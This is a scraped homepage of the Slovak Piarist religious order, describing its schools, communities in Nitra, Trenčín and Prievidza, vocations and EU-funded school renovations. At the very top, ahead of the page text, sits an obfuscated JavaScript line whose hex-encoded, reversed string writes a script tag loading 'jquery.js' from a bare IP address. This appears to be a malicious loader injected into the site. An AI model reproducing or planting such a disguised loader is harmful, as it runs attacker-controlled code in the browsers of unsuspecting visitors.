var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0])) Rehoľa piaristov na Slovensku | Mužská rehoľa založená sv. Jozefom Kalazanským so špeciálnou starostlivosťou o školy, deti a mládež.
[rev_slider_vc alias=“mex-revslider01″ el_class=“width: 50%;“]


Školstvo

Piaristi využívajú v školách moderné učebné metódy, aby žiakom sprostredkovali nielen informácie a fakty, ale aby ich naučili pracovať s učivom a získavať relevantné poznatky

Zasvätený život

Piaristi na Slovensku žijú v troch kolégiách – v Nitre, Trenčíne a Prievidzi. Venujú sa práci s mládežou, mimoškolským aktivitám a osobnostnému rozvoju.

Celosvetové bratstvo

Rehoľa piaristov nepôsobí iba na Slovensku a v Európe, ale aj v Ázií, Afrike a Amerike.Kto sú piaristi?

Alt

Rehoľa piaristov je rehoľný rád založený sv. Jozefom Kalazanským. Hlavným poslaním rádu je integrálna výchova detí a mládeže, zvlášť chudobných.

viac informácií o reholi

Ako sa stať piaristom?

Alt

Každý človek hľadá vo svojom živote zmysel a naplnenie. Mnoho ľudí pocíti vo svojom živote túžbu odovzdať sa Bohu a pomáhať svojim blížnym. Práve preto radi pomáhame

v rozlišovaní povolaní

Citát mesiaca:

V pravde Božieho svetla je človek schopný uvedomiť si, kým vlastne je.

sv. Jozef Kalazanský - Zakladateľ Rehole piaristov

Projekt „Rekonštrukcia a modernizácia historickej budovy gymnázia“ a projekt „Modernizácia Piaristickej spojenej školy Františka Hanáka
sú spolufinancované z Európskeho fondu regionálneho rozvoja a zo štátneho rozpočtu Slovenskej republiky.